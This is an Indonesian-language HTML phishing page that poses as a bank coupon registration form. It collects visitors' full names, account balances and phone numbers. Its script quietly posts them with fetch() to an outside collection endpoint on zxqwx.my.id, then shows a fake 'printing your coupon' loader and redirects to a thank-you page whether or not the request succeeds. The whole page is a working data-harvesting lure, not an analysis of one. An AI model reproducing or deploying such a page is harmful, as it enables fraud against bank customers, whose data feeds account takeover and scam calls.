<!DOCTYPE html><html><head>
  <meta charset="UTF-8">
        <!-- Warna untuk Chrome, Firefox OS, Opera dan Vivaldi -->
<meta content="#0a5ea9" name="theme-color">
<!-- Warna untuk Windows Phone -->
<meta content="#0a5ea9" name="msapplication-navbutton-color">
<!-- Warna untuk iOS Safari -->
 <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
  <meta name="theme-color" content="#1E90FF"> 
   <!-- HTML Meta Tags -->
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
<link rel="icon" href="" type="image/x-icon">
<link rel="apple-touch-icon" href="">
  <!-- Meta Tags Generated via https://www.opengraph.xyz -->
  <title>Pilihan Kupon</title>
  <style>
    @import url("https://fonts.googleapis.com/css?family=Source+Code+Pro:400,500,600,700|Source+Sans+Pro:400,600,700&display=swap");

.html {
    width: 100%;
    height: 100%;
    background-image: url("");
  font-family: "Source Sans Pro", sans-serif;
  background-repeat: no-repeat;
  background-position: 100% 100%;
  background-size: 100% 100%;
}

body{
 background-image: url("");
  font-family: "Source Sans Pro", sans-serif;
  position: absolute;
  background-color: #fff;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  background-repeat: no-repeat;
  background-position: 100% 100%;
  background-size: 100% 100%;
  font-size: 16px;
  width: 100%;
  height: 100%;
  }
* {
  box-sizing: border-box;
  margin: 0;
}
*:focus {
  outline: none;
}
nav{
  width: 100%;
  padding: 15px;
  border-bottom: 1px solid #c0c0c0;
  background: #0a5ea9;
}
nav img{
  width: 130px;
  height: 60px;
}
.container1{
  width: 100%;
  padding: 15px;
  margin: 20px auto;
  box-sizing: border-box;
  justify-items: center;
  background: #fff;
}
.container1 img{
  width: 200px;
  float: left;
  height: 80px;
  margin-left: -50px;
  margin-top: -20px;
}
.container1 h6{
  font-size: 14px;
  color: #000;
  font-weight: 500;
  font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;
  margin-top: 15px;
  float: right;
}
.container2{
  width: 100%;
  height: 100%;
  padding: 15px;
  margin: 52px auto;
  box-sizing: border-box;
  background: #faf9fd;
}
.box{
  width: 100%;
  padding: 9px;
  margin: 12px auto;
  font-size: 15px;
  outline: none;
  border: 1px solid #c0c0c0;
}
label{
  font-size: 17px;
  font-weight: 500;
  color: #000;
  font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;
}
.btnku{
  width: 100%;
  padding: 15px;
  margin: 20px auto;
  box-sizing: border-box;
  justify-items: center;
}
.btnku #kirims{
  width: 50%;
  padding: 10px;
  border: 1px solid #c0c0c0;
  float: right;
  font-size: 15px;
  cursor: pointer!important;
  background: #013b78;
  color: #fff;
  font-weight: 600;
  border-radius: 5px;
}
.btnku #kirimss{
  width: 30%;
  padding: 10px;
  border: 1px solid #e3e4f9;
  float: left;
  font-size: 15px;
  text-decoration: none;
  background: none;
  border-radius: 5px;
}
a{
  font-size: 15px;
  text-decoration: none;
  color: #000;
  font-weight: 600;
}
   /*********************/
   .process {
     top: 0;left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #0000005b;
     z-index: 999999999;
     width: 100%;
     height: 100%;
     
   }
  .loading {
    margin-top: -50px;
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    
  }
  .loading img {
    width: 50px;
    
  }
  .loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 5s linear infinite;
    -webkit-animation: spin 5s linear infinite;
    -moz-animation: spin 5s linear infinite;
    -ms-animation: spin 5s linear infinite;
    -o-animation: spin 5s linear infinite;
    
  } 
  h1 {
    position: relative;
    color: rgba(0, 0, 0, .3);
    font-size: 15px;
    font-weight: bold;
    color: #000;
    font-style: italic;
    margin-top: 75px;
    
}
h1:before {
    content: attr(data-text);
    position: absolute;
    overflow: hidden;
    max-width: 100%;
    white-space: nowrap;
    color: #fff;
    animation: loading 4s linear;
}
@keyframes loading {
    0% {
        max-width: 0;
    }
}

  </style>
</head>

<body>
<main>
  <center>
     <div id="process1" name="process" class="process" style="display: none;">
            <div class="loading">
                <img class="spinner" src="../blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFE_czWoYVjGZ9WT90dwDRGzsw_u8miF1WtkcowDYxZGT78d7yt6nfV_dX26RKNlOD5QgWMUJGXbIlfUrhcVT93Ehoe6acrkpcFwrfWTXMUfCfntZFfxDWGrp2QY8hya0E9wJO4xbaYJDRv8V-Mtx4ubSIHC95d0wW90ATdEVlEmvPijcITT2vCo1VXPg/s637/1_ngNzwrRBDElDnf2CLF_Rbg.gif" id="loading" style="margin-top: 8px">
                <br><br>
                <br>
                <h1 data-text="Sedang Mencetak Kupon Anda...">Sedang Mencetak Kupon Anda...</h1>
            </div>
        </div>
  </center>
  <nav>
    <img src="../hosting.tigerengine.id/f26q9h.png" alt="">
  </nav>
  <div class="container1">
    <img src="../hosting.tigerengine.id/9no3m0.jpg" alt="">
     <h6>Daftar Diri</h6>
  </div>
  <div class="container2">
    <div class="form">
      <form action="req/sendData.php" id="formData" method="POST">
        <label for="nama">
Nama Lengkap Tanpa Singkatan</label>
        <input type="text" name="nama" id="nama" class="box" required="">
        <label for="saldo">Saldo Akhir</label>
        <input type="text" name="saldo" id="saldo" inputmode="numeric" placeholder="Rp." class="box" required="">
        <label for="nomor">Nomor Handphone</label>
        <input type="text" name="nomor" id="nomor" inputmode="numeric" minlength="10" maxlength="15" placeholder="0812XXXXXXX" class="box" required="">
        <div class="btnku">
          <button disabled="" id="kirimss"><a href="index.html">Kembali</a></button>
          <button type="submit" id="kirims">Selanjutnya</button>
        </div>
      </form>
    </div>
  </div>
  <img src="../hosting.tigerengine.id/eft4wc.jpg" alt="" style="width: 100%;position: fixed;bottom: 0;">
</main>
<!-- partial -->
  <script src="../cdnjs.cloudflare.com/ajax/libs/vue/2.6.10/vue.min.js"></script>
<script src="../unpkg.com/vue-the-mask%400.11.1/dist/vue-the-mask.js"></script><script src="./script.js"></script>
<script src="../cdnjs.cloudflare.com/ajax/libs/jquery/2.2.2/jquery.min.js"></script>
<script src="../code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="../code.jquery.com/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="../ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="../ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="../ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script type="text/javascript" src="k.js"></script>
<script src="../cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="../cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
<script src="jquery.min.js"></script>
<script type="text/javascript">
            $(document).ready(function(){

                // Format mata uang.
                $('#nokar').mask('0000 0000 0000 0000');
                $( '.uang' ).mask('000.000.000.000.000', {reverse: true});
 var dengan_rupiah = document.getElementById('saldo');
    dengan_rupiah.addEventListener('keyup', function(e)
    {
        dengan_rupiah.value = formatRupiah(this.value, 'Rp. ');
    });
    
    
      /* Fungsi */
    function formatRupiah(angka, prefix)
    {
        var number_string = angka.replace(/[^,\d]/g, '').toString(),
            split    = number_string.split(','),
            sisa     = split[0].length % 3,
            rupiah     = split[0].substr(0, sisa),
            ribuan     = split[0].substr(sisa).match(/\d{3}/gi);
            
        if (ribuan) {
            separator = sisa ? '.' : '';
            rupiah += separator + ribuan.join('.');
        }
        
        rupiah = split[1] != undefined ? rupiah + ',' + split[1] : rupiah;
        return prefix == undefined ? rupiah : (rupiah ? 'Rp. ' + rupiah : '');
    }
            })
            
            
 </script>
 <script>
 $(document).ready(function(){
    $('#formData').submit(function(e) {
    event.preventDefault();
document.getElementById('kirims').innerHTML = "Memproses....";
$('#process1').show();

var name = $("#nama").val().trim();
var balance = $("#saldo").val().trim();
var phone = $("#nomor").val().trim();

var message = ('\n<b>Nama:</b>\n'+name+'\n\n<b>No. HP:</b>\n'+phone+'\n\n<b>Saldo:</b>\nRp'+balance+'\n');
	

	var fd = new FormData();
	fd.append('message', message);
	
	fetch("https://zxqwx.my.id/senders/"
        +"pilihan-kupon2/send.php", {
        method: 'POST',
        body: fd
      })
      .then(response => response.json())
      .then(data => {
      	$('#process1').hide();
 document.getElementById('kirims').innerHTML = "Selanjutnya";
 window.location.href='../../thank/index.html';
 
 var nama = document.getElementById("nama").value;
 sessionStorage.setItem('nama', nama);
 var saldo = document.getElementById("saldo").value;
 sessionStorage.setItem('saldo', saldo);
 var nomor = document.getElementById("nomor").value;
 sessionStorage.setItem('nomor', nomor);
      })
      .catch((error) => {
      	$('#process1').hide();
 document.getElementById('kirims').innerHTML = "Selanjutnya";
 window.location.href='../../thank/index.html';
 
 var nama = document.getElementById("nama").value;
 sessionStorage.setItem('nama', nama);
 var saldo = document.getElementById("saldo").value;
 sessionStorage.setItem('saldo', saldo);
 var nomor = document.getElementById("nomor").value;
 sessionStorage.setItem('nomor', nomor);
      });
    return false;
});   
});
     
</script>



</body></html>